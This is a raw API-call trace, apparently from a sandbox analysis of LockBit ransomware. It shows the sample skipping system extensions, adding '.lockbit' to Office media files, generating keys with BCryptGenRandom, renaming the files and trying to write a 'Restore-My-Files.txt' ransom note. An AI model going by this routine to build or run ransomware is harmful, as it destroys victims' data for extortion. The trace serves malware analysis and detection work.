[0197.155] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.155] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.156] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.156] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0233070.WMF") returned 1 [0197.157] lstrcmpiW (lpString1="ntldr", lpString2="J0233070.WMF") returned 1 [0197.157] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0233070.WMF") returned 1 [0197.157] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0233070.WMF") returned -1 [0197.157] lstrcmpiW (lpString1="autorun.inf", lpString2="J0233070.WMF") returned -1 [0197.157] lstrcmpiW (lpString1="thumbs.db", lpString2="J0233070.WMF") returned 1 [0197.157] lstrcmpiW (lpString1="iconcache.db", lpString2="J0233070.WMF") returned -1 [0197.157] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.157] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF") returned=".WMF" [0197.157] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.157] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.157] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.158] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.159] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.159] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.159] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.159] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.159] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.159] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF.lockbit") returned 70 [0197.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0233070.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0197.165] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.165] malloc (_Size=0x40068) returned 0x3d70450 [0197.165] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5410) returned 1 [0197.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0197.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0197.166] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0197.170] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.170] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.170] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.172] free (_Block=0x1fa2ed8) [0197.172] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.172] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.172] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.172] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36d32e00, ftCreationTime.dwHighDateTime=0x1be56ed, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x36d32e00, ftLastWriteTime.dwHighDateTime=0x1be56ed, nFileSizeHigh=0x0, nFileSizeLow=0x80f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0233312.WMF", cAlternateFileName="")) returned 1 [0197.172] lstrcmpiW (lpString1=".", lpString2="J0233312.WMF") returned -1 [0197.172] lstrcmpiW (lpString1="..", lpString2="J0233312.WMF") returned -1 [0197.172] PathFindExtensionW (pszPath="J0233312.WMF") returned=".WMF" [0197.172] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.172] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.173] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.174] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.174] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0233312.WMF") returned 1 [0197.175] lstrcmpiW (lpString1="ntldr", lpString2="J0233312.WMF") returned 1 [0197.175] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0233312.WMF") returned 1 [0197.175] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0233312.WMF") returned -1 [0197.175] lstrcmpiW (lpString1="autorun.inf", lpString2="J0233312.WMF") returned -1 [0197.175] lstrcmpiW (lpString1="thumbs.db", lpString2="J0233312.WMF") returned 1 [0197.175] lstrcmpiW (lpString1="iconcache.db", lpString2="J0233312.WMF") returned -1 [0197.175] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.175] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF") returned=".WMF" [0197.175] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.175] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.175] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.176] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.176] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF.lockbit") returned 70 [0197.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0233312.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0197.178] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.178] malloc (_Size=0x40068) returned 0x3e70008 [0197.178] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=33016) returned 1 [0197.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.179] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.179] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0197.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0197.180] ReadFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0197.185] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.185] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.185] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.187] free (_Block=0x1fa2ed8) [0197.187] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.187] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.187] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.187] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23f92c00, ftCreationTime.dwHighDateTime=0x1be8094, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x23f92c00, ftLastWriteTime.dwHighDateTime=0x1be8094, nFileSizeHigh=0x0, nFileSizeLow=0x6632, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0234131.WMF", cAlternateFileName="")) returned 1 [0197.187] lstrcmpiW (lpString1=".", lpString2="J0234131.WMF") returned -1 [0197.187] lstrcmpiW (lpString1="..", lpString2="J0234131.WMF") returned -1 [0197.187] PathFindExtensionW (pszPath="J0234131.WMF") returned=".WMF" [0197.187] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.187] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.187] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.187] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.187] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.187] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.187] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.188] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.189] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.189] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.190] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.190] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.190] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234131.WMF") returned 1 [0197.190] lstrcmpiW (lpString1="ntldr", lpString2="J0234131.WMF") returned 1 [0197.190] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234131.WMF") returned 1 [0197.190] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234131.WMF") returned -1 [0197.190] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234131.WMF") returned -1 [0197.190] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234131.WMF") returned 1 [0197.190] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234131.WMF") returned -1 [0197.190] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.190] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234131.WMF") returned=".WMF" [0197.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.191] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.191] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.192] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.192] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft 